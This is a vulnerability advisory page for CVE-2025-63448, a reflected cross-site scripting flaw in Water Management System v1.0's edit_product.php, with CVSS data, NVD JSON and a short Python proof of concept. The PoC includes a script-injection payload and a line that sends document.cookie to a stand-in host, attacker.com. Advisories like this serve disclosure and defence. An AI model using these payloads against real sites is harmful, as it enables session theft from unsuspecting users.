Security Vulnerability Report
中文
CVE-2025-63448 CVSS 6.1 MEDIUM

CVE-2025-63448

Published: 2025-11-03 16:15:37
Last Modified: 2025-11-07 20:45:12

Description

Water Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /edit_product.php?id=1.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:water_management_system_project:water_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Water Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63448 PoC - XSS in Water Management System v1.0 # Target: Water Management System /edit_product.php # Payload: <script>alert(document.cookie)</script> import requests import urllib.parse target_url = "http://target-server.com/edit_product.php" # XSS payload to steal cookies payload = "<script>alert(document.cookie)</script>" # Alternative payload for data exfiltration steal_cookie_payload = "<script>fetch('http://attacker.com/log?c='+document.cookie)</script>" # Construct malicious URL malicious_url = f"{target_url}?id=1{urllib.parse.quote(payload)}" print(f"[*] Generated malicious URL: {malicious_url}") print(f"[*] Victim needs to visit this URL while authenticated") # Verify the vulnerability exists response = requests.get(malicious_url) if payload in response.text: print("[+] Vulnerability confirmed - XSS payload reflected in response") else: print("[-] Payload not found in response - may be filtered or patched")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63448", "sourceIdentifier": "[email protected]", "published": "2025-11-03T16:15:36.997", "lastModified": "2025-11-07T20:45:11.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Water Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /edit_product.php?id=1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:water_management_system_project:water_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C58F1E69-BA8D-4995-BB68-311AC61B76C7"}]}]}], "references": [{"url": "https://github.com/sanin-s1r3n/CVE-Research/blob/main/CVE-9", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}